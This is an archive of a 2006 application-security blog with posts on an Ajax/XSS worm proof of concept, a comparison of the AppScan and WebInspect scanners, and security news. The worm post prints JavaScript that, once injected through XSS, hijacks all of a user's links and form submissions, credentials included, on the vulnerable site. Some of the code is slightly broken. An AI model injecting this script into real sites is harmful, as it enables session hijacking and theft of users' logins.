Tuesday, December 12, 2006

Did you SEEC it yet?

I am pleased to announce SEEC - An application security search engine. This search engine is powered by google and is application security specific. It is still in beta release. You can access it here - SEEC

Why SEEC?
well, SEC is short for security and SEEK means to find, hence SEEC (find within security)
Please do leave your comments and feedback on what your thoughts are on SEEC.


Also, few weeks ago i released AttackLabs - a website to display proof of concepts of various web application attacks. It has two PoC to begin with and i am currently working with jeremiah to display all his PoC on the site. If you wish to display your Proof of concepts on the site, then please feel free to submit your attack on www.attacklabs.com or you can email me at anurag.agarwal@yahoo.com

Wednesday, December 06, 2006

Survey on Application Security Vulnerability Assessment process

Today jeremiah posted the third round of his monthly survey on web application security professionals.
http://jeremiahgrossman.blogspot.com/2006/12/web-application-security-professionals.html

The results of the first two are available here

[1] Nov. 2006
http://jeremiahgrossman.blogspot.com/2006/11/web-application-security-professionals.html

[2] Oct. 2006
http://jeremiahgrossman.blogspot.com/2006/10/web-application-security-professionals.html

This survey would help us assess the current state of vulnerability assessment in our software development life cycle, of course depending on the participation. I would encourage everyone in the applications security field to take this survey. The more the particpation, the better the picture we get out of it. If we have enough data then maybe we can see a deviation report as well.

Sunday, December 03, 2006

Ajax Worm - Proof of Concept

Few weeks ago I demonstrated a Proof of Concept of how easy it is to create an Ajax worm which hijacks a user session and redirects all the user activity through itself. The idea is simply to be able to control and monitor the user activity on a website by inserting the malicious script into the visiting user's session using XSS. I have been advocating for some time now, the extent of damage that can be done using Ajax’s XMLHttpRequest(XHR) object. All you need is a website vulnerable to XSS attack and an attacker can inject a small javascript file which can take control of the user as long as he is on that site and in some cases even after he has left the website. This Proof of Concept is limited to the worm propagating to a single site as Ajax cannot make cross domain requests just yet but it is under consideration. If you want cross domain request you may want to consider FlashXMLHttpRequest object.

Advanced javascript and XML also known as Ajax is a relatively newer technology and is already gaining a lot of momentum in the industry. Ajax by itself may not open any new vulnerabilities but it does increase the attack surface and in combination with some vulnerabilities like cross site scripting can be very devastating by providing stealth techniques to it. In traditional web browsing, when a user clicks on a link or submits a form, the request goes to the server and the server responds back with the response and a new page is loaded on the screen and a new url is displayed on the location bar (unless it’s a dynamic page and is submitting to itself). In either case, a user can see a browser screen getting refreshed and a new page getting loaded on the screen as the request and response were handled by the browser. With the use of Ajax, the same request and response can be handled by the application. So now when a user clicks on a link or submits a form, using XHR object it can all be done behind the scenes by the web application and the page doesn’t have to refresh like it used to in the traditional way. The url on the location bar remains the same even though we may be loading a different url altogether. Though, ajax has helped immensely with the applications trying to provide a better user experience and a rich user interface, but at the same time it has opened a world of opportunities for the bad guys. Now an attacker can do a lot more damage then it usually would have by exploiting vulnerabilities in your application as. For example, if someone can exploit a cross site scripting vulnerability in your application, with the help of ajax they can virtually control your application.

In this paper, I will explain, how easy it is to hijack a website with the help of ajax by inserting a script which propagates to every page you visit on that website.


When the script is injected into a vulnerable site, create_object, collect_links and collect_forms method from worm.js script are called.

//Create an ajax object
create_object creates a cross browser connection to the server using ajax. For IE 5 and 6 we use ActiveXObject and IE7 and firefox we use XMLHttpRequest. All the ajax communications are done using this object. The XMLHttpRequest object is an interface exposed by a scripting engine that allows scripts to perform HTTP client functionality, such as submitting form data or loading data from a server. The name of the object is XMLHttpRequest for compatibility with the web as it doesn't make much sense otherwise. It supports the transport of other data formats in addition to XML, some implementations support other protocols besides HTTP (that functionality is not covered in this specification though) and the API supports sending data as well.

function create_object() {
// This is a strip down version of what I am using in the actual script to demonstrate how to create a XHR object.
if(window.ActiveXObject) {
ajax_request = new ActiveXObject(MSXML2.XMLHTTP);
}

if (!ajax_request && typeof XMLHttpRequest != 'undefined') {
ajax_request = new XMLHttpRequest ();
}
}

//Code to capture all the links
This is where we capture all the links in a website. If it is an internal link then we replace it with our javascript function, so now whenever a user clicks on any of the link, browser instead of opening that page, calls the javascript function and which in turn silently communicates with the server in the background, fetches the link and loads the page in the memory and while doing so, it captures all the links and forms of the newly loaded page.

function collect_links()
{
//Collect all the link in the html page.
var all_links = document.getElementsByTagName("a");

//Go through all the links one by one.
for(var i = 0; i < all_links.length; i++) {

//Replace all the links with the javascript function.
all_links[i].href="javascript:loadUrl('" + all_links[i].href + "');";
}
}


//Code to capture all the forms.
This is where we capture all the forms in a web page. collect_forms function does the same thing as collect_links does except for it just looks for all the forms and replaces their action attribute with its javascript function. It also inserts or replaces (if already exists) the id of the form with the actual url so that the worm script can identify them at the time of submission. As you will see in the last line here that the action attribute is replaced by the submit_form function of the worm. So now when the user will try to submit any form, instead of browser submitting the form to the server, the submit_form function will be called.

function collect_forms()
{
//Collect all the forms in the html page.
var all_forms = document.getElementsByTagName("form");

//Go through all the forms one by one.
for(var i = 0; i < all_forms.length; i++) {
//Replace the id of the form with the original submit url.
all_forms[i].id = all_forms[i].action;

//Replace the submit url of the page with the javascript function.
all_forms[i].action="javascript:submit_form('" + all_forms[i].action + "');";
}
}


//Code to load the requested url dynamically
loadUrl function takes the url as a parameter and connects to the server and requests for that url. The server treats it as any other request it would have received from the client and sends the file with that url. Normally it is the browser who receives the file and displays it in the browser, but with Ajax it is our XHR object which receives the file and updates the client screen with the new html code, then it calls collect_links and collect_forms function to hijack the links and forms in the new html code. This way, the worm script is always in control of all the request/response made from the client browser to the server.

function loadUrl(url)
{
//Connect to the server and request for that url.
ajax_request.open("GET", url, false);
ajax_request.send(null);

//Look for the request state and status. Status = 200 means the request was successful
if(ajax_request.status == 200) {
//Load the response from the server into the document’s body. This will dynamically
change the content of the page but the url on the address bar of the browser will
remain the same. So, even though the new url is loaded, the location bar of browser
will show the url of the original page.
var response_text = ajax_request.responseText;
document.body.innerHTML = response_text;

//Hijack all the links and forms in the new html page.
collect_links();
collect_forms();
}
}


//Code to create the form parameter string
This function is called when a user tries to submit a form. As all the forms are hijacked and replaced with submit_form function of the javascript, when the user clicks on submit button, this function is called with the id of the form which was already replaced at the time of hijacking. Based on that id, the script loads all the forms and its elements. It then calls the post_attacker function which submits the values to the server, captures the response and displays on the user window and hijacks any links or forms in the new html code. For the sake of this demo, when you enter a username and password on the login page and clicks on submit, then the script displays the values on the screen before calling the post_attacker function.
function submit_form(form_id)
{
//get the form element from the id.
var form = document.getElementById(form_id);

//This is where the form values are displayed when the user presses the submit button.
var form_submit = document.getElementById('form_element');
form_submit.innerHTML = "These values will be submitted to " + form_id + "
";

//All the parameters have to be in the format of name=value to be able to submit to the server.
var post_url = "";

//Iterate through every element of the form.
for(var i = 0; i < form.length; i++) {
var line = form.elements[i].name + " = " + form.elements[i].value +;
form_submit.innerHTML += line + "
";
post_url += line;

//Multiple name=value have to be separated with &
if(i+1 < form.length)
post_url += "&";
}

//post it to the server.
post_attacker(form_id, post_url);
}

//Code to submit the form dynamically
function post_attacker(url, parameters) {

//Create a POST connection to the url.
ajax_request.open("POST", url, false);

//Set the header values.
ajax_request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");

//Send the parameters
ajax_request.send(parameters);

//Load the response from the server into the document’s body
if(ajax_request.readyState == 4 && ajax_request.status == 200) {
var response_text = ajax_request.responseText;
document.body.innerHTML = response_text;

//Hijack all the links and the forms.
collect_links();
collect_forms();
}
}


As you can see, it is so easy to create a worm with the help of Ajax, which controls all the communication between the user and the server. Whatever link a user clicks on or submits a form, everything is passed through the worm script. It also has the capability to make changes to the data before it gets submitted to the server or before it gets loaded in the user browser after it is received from the server.

This is just a proof of concept to reiterate how deadly a combination of cross site scripting and Ajax can be. Currently this is limited to the same site as we cannot make cross domain Ajax requests just yet. With cross domain Ajax requests, the implications could be far more dangerous. I am not against having cross domain requests in Ajax but if and when they do allow it, they should consider the security implications as well and if possible suggest solutions or scenarios which a developer should consider while using cross domain Ajax requests.


To look at the demo of the Proof of concept, please go to http://www.attacklabs.com
To download the source code, go to http://www.attacklabs.com/download/ajax_worm.zip

Monday, November 20, 2006

Correction - Comparison between Appscan and Webinspect

In my last posting, i discussed about some of the difference between appscan and webinspect. Ory Segal from watchfire pointed out a few areas which could have been interpreted wrongly as well. I have made changes to the original post and i am posting it separately for those who have already read it or if it is stored in cache somewhere.


  • View the actual attack during a scan session: Webinspect displays the actual attack string on the status bar during the scan and also if a vulnerability was found whereas in Appscan you can only view if there was a vulnerability found.


  • Vulnerabilities: Appscan found more vulnerabilities with more variants in a scan as compared to Webinspect. One other difference between the two products in terms of vulnerabilities is if there are 200 pages with same vulnerabilities, Appscan will display 1 vulnerability but can drill down to all the 200 pages whereas Webinspect will display as 1. Having said that, Appscan still detects more types of vulnerabilities then Webinspect.


  • What if webapp stops responding during scan: If your webapp stops responding during the scan, Webinspect displays an error and pauses the scan, so you can fix the problem and resume the scan later. Though appscan does the same but since the pause button is not on the toolbar and is as a dropdown it get a little confusing.



For comments and feedback, please email me at anurag.agarwal@yahoo.com

Friday, November 03, 2006

Comparison between Appscan vs Webinspect

Last month I got a chance to evaluate the two popular vulnerability assessment tools Webinspect and Appscan and I wanted to share my findings with others. As you will notice, currently I have published only few technical comparison I will add more to it sooner. This comparison is strictly between Appscan 6.5 and Webinspect 6.2. Both the companies have since come with a beta release of a new version of their products and this comparison may not be valid for their new versions.
The evaluation was done on a dynamic web application with approx 1800 web pages.

  • Scan duration: On a website of approx. 1800 pages, Appscan took around 6 hours whereas webinspect took more then 12 hours (i had to stop it there as it would have taken a lot more time). Then i removed post-data injection from the list of attacks and the entire scan was completed in approx 4 hours.

  • Ability to pause a scan: Both the tools give you an ability to pause a scan and restart later.

  • Save a partial scan and restart later: Both the tools allow you to save a partial scan and restart it later.

  • What if webapp stops responding during scan: If your webapp stops responding during the scan, Webinspect displays an error and pauses the scan, so you can fix the problem and resume the scan later. Though appscan does the same but since the pause button is not on the toolbar and is as a dropdown it get a little confusing.

  • Change the network in the middle of a scan session: While a scan is in progress, if you want to pause it and resume from your home over a vpn connection, Appscan lets you resume the scan without any problems whereas Webinspect gave me an error. Though I just tried it once, I am not too sure if this is a problem with Webinspect. You can check it on your own if you're going to need this feature.

  • Maximum thread that can run simultaneously: Appscan has maximum of 10 threads whereas Webinspect has 75. You can customize the number of threads you want to run simultaneously. However, if you use more then 15 threads in Webinspect, it becomes very resource intensive.

  • Pick and choose attacks for a scan session: Both Appscan and Webinspect lets you do that.

  • Skip an attack while the scan is in progress: Webinspect lets you skip an attack while the scan is in progress whereas Appscan doesn't.

  • View the actual attack during a scan session: Webinspect displays the actual attack string on the status bar during the scan and also if a vulnerability was found whereas in Appscan you can only view if there was a vulnerability found.

  • Customize the order of attack for a scan session: Neither of the product lets you customize the order of scan. So, if you want to run Cross site scripting and SQL injection first then you will have to create a new scan session and just opt for these two attacks and remove all others from the list.

  • Custom attack scripts: Both Appscan and Webinspect lets you create a custom attack script as a macro. Webinspect however lets you create a custom attack agent using VB script.

  • Vulnerability Database updated: Both the product update their vulnerabilities regularly.

  • Vulnerabilities: Appscan found more vulnerabilities with more variants in a scan as compared to Webinspect. One other difference between the two products in terms of vulnerabilities is if there are 200 pages with same vulnerabilities, Appscan will display 1 vulnerability but can drill down to all the 200 pages whereas Webinspect will display as 1. Having said that, Appscan still detects more types of vulnerabilities then Webinspect.

  • Login module at the start of scan:Appscan lets you record a login sequence as a macro whereas Webinspect gives you more options. It lets you record a login sequence as a macro or enter the authentication credentials in the tool itself. The problem however with entering the authentication credentials inside the tool is that if they are wrong, Webinspect does not detects them as wrong and goes ahead with the scan and hence may not scan the entire site. In the other scenario, if you are using macro to record the login sequence, then Webinspect records the complete login and logout sequence whereas Appscan only records the login sequence.

  • Bookmark of follow up flag on a specific attack during a scan session: None of the tools currently have this feature.

  • External tools: Both the products have additional tools bundled with them. Watchfire's power tools are not integrated with Appscan and can be downloaded and used separately. Appscan, however, provides a framework where external tools can be invoked from within Appscan. Webinspect on the other hand, have more tools and all of them are tightly integrated within the product. Webinspect does not allows you to invoke an external tool from within the application.

  • Appscan scans for certain infrastructure vulnerabilities (like Apache, IIS, etc) whereas Webinspect does not.


This is by no means a complete report. I will add more points to it sooner so please check back again. Also, if there is something additional you would like to see in this report or if you would like to add to this report or even make changes to this report, please email me at anurag.agarwal "at" yahoo.com. I also got a chance to look at the beta release of Appscan 7.0 and Webinspect phoenix release and if you are looking to purchase one of these two products then I would strongly recommend looking at their beta releases of new versions.

Thursday, October 26, 2006

Don't let your Web app help spammers

We've all been plagued by unsolicited commercial email -- also known as spam. In fact, the Washington Post reported that spam may soon account for half of all U.S. email traffic.
Lets look at ways on how we can protect our email address from the spammers.
read the complete article here

Wednesday, October 11, 2006

How Ajax makes it easier to steal information from your clipboard

Cut Copy Paste has always been an important part of our digital life. Developers, as well as regular users, can't live without it. Regular users use it routinely to copy and paste information such as passwords and credit card numbers from one form to another. Office employees use it all the time when creating documents. There's no denying our reliance on the Copy and Paste functionality of the clipboard.

How would you feel if that information were stolen out of your computer?

read the complete article here

Sunday, October 08, 2006

Taking the battle to the phishers

"University of Illinois at Chicago is working with some financial institutions (he can't say which) on the anti-phishing agent, so there is commercial interest. "We'll be providing them complex code, user names, and passwords," he says. "And they will be able to see the phishing traffic" and disable it and track the phishers for eventual prosecution, for instance. "

This would be really interesting. So far we have seen few approaches including that of building a database of phishing sites. Though that is a slow and evolving process, but not good enough to stop phishing attacks. This anti phishing agent may just be the answer to provide quick solution to phishing attacks.

read the complete article here

Friday, October 06, 2006

Court OKs NSA wiretapping

http://www.wired.com/news/wireservice/0,71911-0.html?tw=wn_technology_security_3

"The Bush administration can continue its warrantless surveillance program while it appeals a judge's ruling that the program is unconstitutional, a federal appeals court ruled Wednesday."

"The program monitors international phone calls and e-mails to or from the United States involving people the government suspects have terrorist links. A secret court has been set up to grant warrants for such surveillance, but the government says it can't always wait for a court to take action."


Are they monitoring only what they have mentioned here?

Is Microsoft changing?

http://wired.com/wired/archive/14.10/microsoft.html

Something different from security but if all the chief security architect could be as Ray Ozzie, 75% of the security attacks we are seeing today wont be possible at all.

How safe is “hacker safe”

ID Thieves Turn Sights on Smaller E-Businesses

This article raises so many questions but the biggest of them all is how effective are these sites which are providing this kind of “hacker safe” services and who is to verify what level of services they are providing. For all we know, it’s just a false sense of security as we found out in this case. The companies, who are totally not aware of what to do about information security, get sucked into these kinds of services and are at the mercy of hackers.

Google victim of click fraud

This time it was google’s turn to play victim of click fraud.

http://www.theregister.co.uk/2006/10/06/google_adsense_worm/

RE: Privacy group takes US to court over email spying

post: http://www.theregister.co.uk/2006/10/06/eff_sues_us_govt/

What I would like to know is if US govt. can state it for the record, that they are only using it to monitor terrorist communications and NOTHING ELSE. They have claimed that they are using it to track terrorist communications but I don’t know if they have said only terrorist communication and nothing else?

Wednesday, October 04, 2006

To open source or not to open source

Yahoo allows outsiders to innovate on Yahoo e-mail

Yahoo has decided to open the underlying code of yahoo mail to outside programmers. Now this can be a good thing and a bad thing. Of course we will see a lot more applications built on top of yahoo mail, but then it is a also a nightmare from the security point of view. On one side, since the source code is allowed access they are more vulnerable to attacks. On the other hand, how secure will be the newer applications which are going to be integrated with yahoo mail.

Tuesday, October 03, 2006

Taking passwords to the grave

Interesting story on the passwords.

http://news.com.com/Taking+passwords+to+the+grave/2100-1025_3-6118314.html

it brings up an interesting twist to the whole password saga by raising a question, whether we should store them in our will. Though it has a valid reason but then isnt that against what we preach.